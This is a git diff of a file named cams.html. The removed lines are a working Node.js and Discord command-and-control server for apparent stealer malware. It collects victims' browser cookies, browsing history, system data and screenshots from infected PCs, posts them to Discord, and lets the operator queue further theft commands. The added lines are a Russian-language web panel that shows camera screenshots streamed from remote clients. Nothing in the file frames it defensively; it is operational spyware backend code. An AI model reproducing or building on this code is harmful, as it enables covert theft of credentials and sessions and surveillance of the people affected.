--- a/public/cams.html
+++ b/public/cams.html
@@ -1,118 +1,92 @@
-import express from "express";
-import { 
-  Client, GatewayIntentBits, ActionRowBuilder, ButtonBuilder, ButtonStyle, ChannelType 
-} from "discord.js";
-import { WebSocketServer } from "ws";
-import http from "http";
-import crypto from "crypto";
-import path from "path";
-import { fileURLToPath } from "url";
+<!DOCTYPE html>
+<html lang="ru">
+<head>
+<meta charset="UTF-8">
+<title>📷 Панель камер</title>
+<style>
+body{margin:0;font-family:Arial;color:#eee;display:flex;height:100vh;overflow:hidden;background:#111}
+.sidebar{width:260px;background:#1a1a1a;border-right:2px solid #333;display:flex;flex-direction:column}
+.sidebar h2{text-align:center;padding:12px;margin:0;border-bottom:2px solid #333;background:#222}
+.cam-list{flex:1;overflow-y:auto}
+.cam-item{padding:10px;cursor:pointer;border-bottom:1px solid #333;display:flex;justify-content:space-between;align-items:center}
+.cam-item:hover{background:#333}
+.cam-item.online{color:#7CFC00}
+.cam-item.offline{color:#ff5555}
+.main{flex:1;display:flex;flex-direction:column}
+.viewer{flex:1;display:flex;justify-content:center;align-items:center;background:#000;position:relative}
+.viewer img{max-width:100%;max-height:100%;border-radius:8px}
+.viewer h3{position:absolute;top:10px;left:10px;background:rgba(0,0,0,0.6);padding:5px 10px;border-radius:5px;margin:0}
+.debug{height:120px;background:#181818;border-top:2px solid #333;overflow-y:auto;font-size:12px;padding:5px;color:#aaa}
+.debug div{margin-bottom:4px}
+</style>
+</head>
+<body>
+<div class="sidebar">
+<h2>📡 Камеры</h2>
+<div id="camList" class="cam-list"></div>
+</div>
+<div class="main">
+<div class="viewer">
+<h3 id="camTitle">Выберите камеру</h3>
+<img id="camImage" src="" alt="">
+</div>
+<div id="debugLog" class="debug"></div>
+</div>
 
-const __filename = fileURLToPath(import.meta.url);
-const __dirname = path.dirname(__filename);
+<script>
+const camListDiv=document.getElementById("camList"),
+      camTitle=document.getElementById("camTitle"),
+      camImage=document.getElementById("camImage"),
+      debugLog=document.getElementById("debugLog");
 
-const app = express();
-app.use(express.json({ limit: "200mb" }));
-app.use(express.static(path.join(__dirname, "public"))); // cams.html и стили
+let ws,currentCam=null,cams={};
 
-// ---------- Discord ----------
-const DISCORD_BOT_TOKEN = process.env.DISCORD_BOT_TOKEN;
-const GUILD_ID = process.env.GUILD_ID;
+function logDebug(msg){
+    const line=document.createElement("div");
+    line.textContent=`[${new Date().toLocaleTimeString()}] ${msg}`;
+    debugLog.appendChild(line);
+    debugLog.scrollTop=debugLog.scrollHeight;
+}
 
-const CATEGORY_BASE_PC = "🖥️ Все ПК";
-const CATEGORY_BASE_CAM = "📷 Камеры";
-const LOG_CATEGORY = "📝 Логи";
-const LOG_CHANNEL = "📡 server-logs";
-const MAX_FILE_SIZE = 6 * 1024 * 1024;
+function connectWS(){
+    ws=new WebSocket(`wss://${location.host}/?camId=all`);
+    ws.onopen=()=>logDebug("✅ WebSocket подключён");
+    ws.onerror=e=>logDebug("❌ WS ошибка: "+e.message);
+    ws.onclose=()=>{ logDebug("⚠️ WebSocket отключён, переподключение..."); setTimeout(connectWS,2000); };
+    ws.onmessage=e=>{
+        const {camId,screenshot}=JSON.parse(e.data);
+        const now=Date.now();
+        if(!cams[camId]) addCamera(camId);
+        cams[camId].lastSeen=now;
+        if(currentCam===camId){
+            camImage.src="data:image/jpeg;base64,"+screenshot;
+            camTitle.textContent=`📷 Камера: ${camId}`;
+        }
+    };
+}
 
-const onlinePCs = {}, pendingCommands = {}, pcData = {};
-const channelByPC = {}, channelByCam = {}, wsCameraClients = {}, camLastUpload = {};
-let logCategoryCache = null, logChannelCache = null;
-let categoryCacheByGuild = new Map(), channelCacheByGuild = new Map();
+function addCamera(camId){
+    const el=document.createElement("div");
+    el.className="cam-item offline";
+    el.textContent=camId;
+    el.onclick=()=>{ 
+        currentCam=camId; 
+        camTitle.textContent=`📷 Камера: ${camId}`; 
+        logDebug(`➡️ Выбрана камера ${camId}`);
+    };
+    camListDiv.appendChild(el);
+    cams[camId]={el,lastSeen:0};
+}
 
-const bot = new Client({ intents: [GatewayIntentBits.Guilds] });
-bot.once("ready", () => console.log(`✅ Discord бот вошёл как ${bot.user.tag}`));
-bot.login(DISCORD_BOT_TOKEN);
+// Обновление статуса онлайн/оффлайн
+setInterval(()=>{
+    const now=Date.now();
+    Object.entries(cams).forEach(([id,cam])=>{
+        cam.el.className="cam-item "+(now-cam.lastSeen<10000?"online":"offline");
+    });
+},3000);
 
-function shortHash(s,len=8){return crypto.createHash('sha1').update(s).digest('hex').slice(0,len);}
-function safeChannelName(prefix,id){return `${prefix}-${shortHash(id,8)}`.toLowerCase().replace(/[^a-z0-9\-]/g,'-').slice(0,90);}
-async function logToDiscord(msg){try{const guild=await bot.guilds.fetch(GUILD_ID); const channel=await getOrCreateLogChannel(guild); await channel.send(`[${new Date().toISOString()}] ${msg}`);}catch(e){console.error(e);}}
-async function getOrCreateCategory(guild,name){const gid=guild.id;if(!categoryCacheByGuild.has(gid))categoryCacheByGuild.set(gid,{});const cache=categoryCacheByGuild.get(gid);if(cache[name]) return cache[name];const channels=await guild.channels.fetch();const matches=channels.filter(c=>c.type===ChannelType.GuildCategory&&c.name===name);if(matches.size>=1){cache[name]=matches.first();return matches.first();} const created=await guild.channels.create({name,type:ChannelType.GuildCategory}); cache[name]=created; return created;}
-async function getOrCreateTextChannel(guild,name,parentId){const gid=guild.id;if(!channelCacheByGuild.has(gid))channelCacheByGuild.set(gid,{});const cache=channelCacheByGuild.get(gid); const key=`${name}::${parentId}`; if(cache[key]) return cache[key]; const channels=await guild.channels.fetch(); const matches=channels.filter(c=>c.type===ChannelType.GuildText&&c.name===name&&c.parentId===parentId); if(matches.size>=1){cache[key]=matches.first();return matches.first();} const created=await guild.channels.create({name,type:ChannelType.GuildText,parent:parentId}); cache[key]=created; await logToDiscord(`Создан канал ${name}`); return created;}
-async function getOrCreateLogChannel(guild){if(logChannelCache) return logChannelCache; const category=logCategoryCache||await getOrCreateCategory(guild,LOG_CATEGORY); logCategoryCache=category; const channels=await guild.channels.fetch(); const matches=channels.filter(c=>c.type===ChannelType.GuildText&&c.name===LOG_CHANNEL&&c.parentId===category.id); if(matches.size>0){logChannelCache=matches.first();return matches.first();} const created=await guild.channels.create({name:LOG_CHANNEL,type:ChannelType.GuildText,parent:category.id}); logChannelCache=created; return created;}
-
-function createControlButtons(pcId){ const safePcId=encodeURIComponent(pcId); return [new ActionRowBuilder().addComponents(
-  new ButtonBuilder().setCustomId(`check_online|${safePcId}`).setLabel("Чек онлайн").setStyle(ButtonStyle.Primary),
-  new ButtonBuilder().setCustomId(`get_cookies|${safePcId}`).setLabel("Куки").setStyle(ButtonStyle.Success),
-  new ButtonBuilder().setCustomId(`get_history|${safePcId}`).setLabel("История").setStyle(ButtonStyle.Success),
-  new ButtonBuilder().setCustomId(`get_system|${safePcId}`).setLabel("Система").setStyle(ButtonStyle.Secondary),
-  new ButtonBuilder().setCustomId(`get_screenshot|${safePcId}`).setLabel("Скрин").setStyle(ButtonStyle.Secondary)
-)];}
-
-bot.on("interactionCreate",async interaction=>{if(!interaction.isButton())return;const[command,encodedPcId]=interaction.customId.split("|");const pcId=decodeURIComponent(encodedPcId); if(!pendingCommands[pcId])pendingCommands[pcId]=[]; pendingCommands[pcId].push(command); await interaction.reply({content:`✅ Команда "${command}" отправлена ПК ${pcId}`,ephemeral:true});});
-
-// ---------- Upload PC ----------
-app.post("/upload-pc",async(req,res)=>{
-try{
-const { pcId, cookies, history, systemInfo, screenshot }=req.body;
-if(!pcId) return res.status(400).json({error:"pcId required"});
-onlinePCs[pcId]=Date.now();
-pcData[pcId]={cookies,history,systemInfo,screenshot};
-
-const guild=await bot.guilds.fetch(GUILD_ID);
-const category=await getOrCreateCategory(guild,CATEGORY_BASE_PC);
-const channelName=safeChannelName('pc',pcId);
-let finalChannel=null,isNewPc=false;
-if(channelByPC[pcId]) finalChannel=await guild.channels.fetch(channelByPC[pcId]).catch(()=>null);
-if(!finalChannel){finalChannel=await getOrCreateTextChannel(guild,channelName,category.id); channelByPC[pcId]=finalChannel.id; isNewPc=true;}
-if(isNewPc){const logChannel=await getOrCreateLogChannel(guild); await logChannel.send(`🚀 Новый ПК подключен: **${pcId}** <@everyone>`);}
-const files=[]; const descriptions=[];
-if(cookies){files.push({attachment:Buffer.from(JSON.stringify({cookies},null,2)) ,name:`${channelName}-cookies.json`}); descriptions.push("🍪 **Cookies** — сохранены");}
-if(history){files.push({attachment:Buffer.from(JSON.stringify({history},null,2)),name:`${channelName}-history.json`}); descriptions.push("📜 **История браузера** — сохранена");}
-if(systemInfo){files.push({attachment:Buffer.from(JSON.stringify({systemInfo},null,2)),name:`${channelName}-system.json`}); descriptions.push("💻 **Системная информация** — сохранена");}
-if(screenshot){files.push({attachment:Buffer.from(screenshot,"base64"),name:`${channelName}-screenshot.jpeg`}); descriptions.push("🖼️ **Скриншот** — сохранён");}
-let contentMsg=`🟢 ПК **${pcId}** обновлён\n\n`+descriptions.join("\n");
-const messageOptions={content:contentMsg,components:createControlButtons(pcId)};
-if(files.length) messageOptions.files=files;
-await finalChannel.send(messageOptions);
-res.json({success:true});
-}catch(e){await logToDiscord(`❌ Ошибка upload-pc: ${e.message}`); res.status(500).json({error:e.message});}
-});
-
-// ---------- Ping ----------
-app.post("/ping",(req,res)=>{
-const {pcId}=req.body; if(!pcId) return res.status(400).json({error:"pcId required"});
-onlinePCs[pcId]=Date.now();
-const commands=pendingCommands[pcId]||[]; pendingCommands[pcId]=[];
-res.json({commands});
-});
-
-// ---------- Upload Cam ----------
-app.post("/upload-cam",async(req,res)=>{
-try{
-const { camId, screenshot }=req.body;
-if(!camId||!screenshot) return res.status(400).json({error:"camId and screenshot required"});
-if(wsCameraClients[camId]) wsCameraClients[camId].forEach(ws=>{try{ws.send(JSON.stringify({camId,screenshot}));}catch(e){}});
-camLastUpload[camId]=Date.now();
-res.json({success:true});
-}catch(e){await logToDiscord(`❌ Ошибка upload-cam: ${e.message}`); res.status(500).json({error:e.message});}
-});
-
-// ---------- WebSocket ----------
-const wss=new WebSocketServer({noServer:true});
-wss.on("connection",(ws,req)=>{
-const url=new URL(req.url,`http://${req.headers.host}`);
-const camId=url.searchParams.get("camId")||"all";
-if(!wsCameraClients[camId]) wsCameraClients[camId]=[];
-wsCameraClients[camId].push(ws);
-ws.on("close",()=>{wsCameraClients[camId]=wsCameraClients[camId].filter(c=>c!==ws);});
-});
-
-// ---------- HTTP сервер ----------
-const PORT=process.env.PORT || 3000;
-const server=http.createServer(app);
-server.on("upgrade",(req,socket,head)=>{ wss.handleUpgrade(req,socket,head,ws=>wss.emit("connection",ws,req)); });
-server.listen(PORT,()=>console.log(`🚀 HTTP сервер слушает порт ${PORT}`));
-
-process.on("uncaughtException",e=>logToDiscord(`💥 Uncaught Exception: ${e.message}`));
-process.on("unhandledRejection",e=>logToDiscord(`💥 Unhandled Rejection: ${e}`));
+connectWS();
+</script>
+</body>
+</html>
